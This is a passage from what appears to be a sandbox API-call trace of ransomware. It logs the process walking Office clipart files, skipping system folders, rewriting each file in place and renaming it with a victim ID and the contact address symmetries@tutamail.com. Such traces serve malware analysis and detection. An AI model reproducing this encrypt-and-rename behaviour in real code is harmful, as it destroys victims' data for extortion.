lpFileSize=0x345e890*=7822) returned 1 [0086.381] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e80) returned 0x205850 [0086.382] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1e80, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1e80, lpOverlapped=0x0) returned 1 [0086.384] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.384] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1e80, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1e80, lpOverlapped=0x0) returned 1 [0086.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0086.384] CloseHandle (hObject=0x314) returned 1 [0086.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0086.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0086.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0086.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0086.384] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0086.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0086.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0086.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0086.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.384] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182902.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182902.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182902.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0086.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0086.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0086.385] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeac9c22, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeac9c22, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeaefe14, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3ed2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0182946.WMF", cAlternateFileName="")) returned 1 [0086.385] lstrcmpiW (lpString1="J0182946.WMF", lpString2=".") returned 1 [0086.385] lstrcmpiW (lpString1="J0182946.WMF", lpString2="..") returned 1 [0086.385] lstrcmpiW (lpString1="J0182946.WMF", lpString2="...") returned 1 [0086.385] lstrcmpiW (lpString1="J0182946.WMF", lpString2="windows") returned -1 [0086.385] lstrcmpiW (lpString1="J0182946.WMF", lpString2="recovery") returned -1 [0086.385] lstrcmpiW (lpString1="J0182946.WMF", lpString2="perflogs") returned -1 [0086.385] lstrcmpiW (lpString1="J0182946.WMF", lpString2="documents and settings") returned 1 [0086.385] lstrcmpiW (lpString1="J0182946.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.385] lstrcmpiW (lpString1="J0182946.WMF", lpString2="system volume information") returned -1 [0086.385] lstrcmpiW (lpString1="J0182946.WMF", lpString2="msocache") returned -1 [0086.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0086.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182946.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182946.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0182946.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0086.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0086.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182946.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0182946.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0182946.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0086.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0086.386] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0086.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.386] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0086.386] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182946.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.386] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=16082) returned 1 [0086.386] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3ed0) returned 0x24d210 [0086.386] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3ed0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3ed0, lpOverlapped=0x0) returned 1 [0086.388] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.388] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3ed0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3ed0, lpOverlapped=0x0) returned 1 [0086.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.389] CloseHandle (hObject=0x314) returned 1 [0086.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0086.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0086.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0086.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0086.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0086.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0086.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0086.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0086.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.389] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182946.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0182946.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0182946.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0086.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0086.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0086.390] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeb1606f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeb1606f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x745c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0183172.WMF", cAlternateFileName="")) returned 1 [0086.390] lstrcmpiW (lpString1="J0183172.WMF", lpString2=".") returned 1 [0086.390] lstrcmpiW (lpString1="J0183172.WMF", lpString2="..") returned 1 [0086.390] lstrcmpiW (lpString1="J0183172.WMF", lpString2="...") returned 1 [0086.390] lstrcmpiW (lpString1="J0183172.WMF", lpString2="windows") returned -1 [0086.390] lstrcmpiW (lpString1="J0183172.WMF", lpString2="recovery") returned -1 [0086.390] lstrcmpiW (lpString1="J0183172.WMF", lpString2="perflogs") returned -1 [0086.390] lstrcmpiW (lpString1="J0183172.WMF", lpString2="documents and settings") returned 1 [0086.390] lstrcmpiW (lpString1="J0183172.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.390] lstrcmpiW (lpString1="J0183172.WMF", lpString2="system volume information") returned -1 [0086.390] lstrcmpiW (lpString1="J0183172.WMF", lpString2="msocache") returned -1 [0086.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0086.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0183172.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0183172.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0183172.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0086.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0086.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0183172.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0183172.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0183172.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0086.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0086.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0086.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0086.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183172.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.425] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=29788) returned 1 [0086.425] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.425] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7450) returned 0x24d210 [0086.425] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7450, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7450, lpOverlapped=0x0) returned 1 [0086.428] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.428] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7450, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7450, lpOverlapped=0x0) returned 1 [0086.429] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.429] CloseHandle (hObject=0x314) returned 1 [0086.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0086.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0086.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0086.430] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0086.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0086.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0086.430] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0086.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0086.430] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.430] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183172.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183172.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183172.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0086.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0086.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0086.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0086.431] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeaefe14, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xeaefe14, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xeb1606f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6fd2, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0183174.WMF", cAlternateFileName="")) returned 1 [0086.431] lstrcmpiW (lpString1="J0183174.WMF", lpString2=".") returned 1 [0086.431] lstrcmpiW (lpString1="J0183174.WMF", lpString2="..") returned 1 [0086.431] lstrcmpiW (lpString1="J0183174.WMF", lpString2="...") returned 1 [0086.431] lstrcmpiW (lpString1="J0183174.WMF", lpString2="windows") returned -1 [0086.431] lstrcmpiW (lpString1="J0183174.WMF", lpString2="recovery") returned -1 [0086.431] lstrcmpiW (lpString1="J0183174.WMF", lpString2="perflogs") returned -1 [0086.431] lstrcmpiW (lpString1="J0183174.WMF", lpString2="documents and settings") returned 1 [0086.431] lstrcmpiW (lpString1="J0183174.WMF", lpString2="$RECYCLE.BIN") returned 1 [0086.431] lstrcmpiW (lpString1="J0183174.WMF", lpString2="system volume information") returned -1 [0086.431] lstrcmpiW (lpString1="J0183174.WMF", lpString2="msocache") returned -1 [0086.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0086.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0183174.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0183174.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0183174.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0086.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0086.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0183174.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0086.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0183174.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0183174.WMF", lpUsedDefaultChar=0x0) returned 12 [0086.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0086.431] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0086.431] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0086.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0086.432] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0086.432] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210910 [0086.432] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0183174.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0183174.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0086.439] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28626) returned 1 [0086.439] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.439] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6fd0) returned 0x24d210 [0086.440] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6fd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6fd0, lpOverlapped=0x0) returned 1 [0086.444] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0086.444] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6fd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6fd0, lpOverlapped=0x0) returned 1 [0086.444] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0086.445] CloseHandle (hObject=0x314) returned 1 [0086.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0086.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0086.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0086.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0086.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0086.445] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0086.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0086.445] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 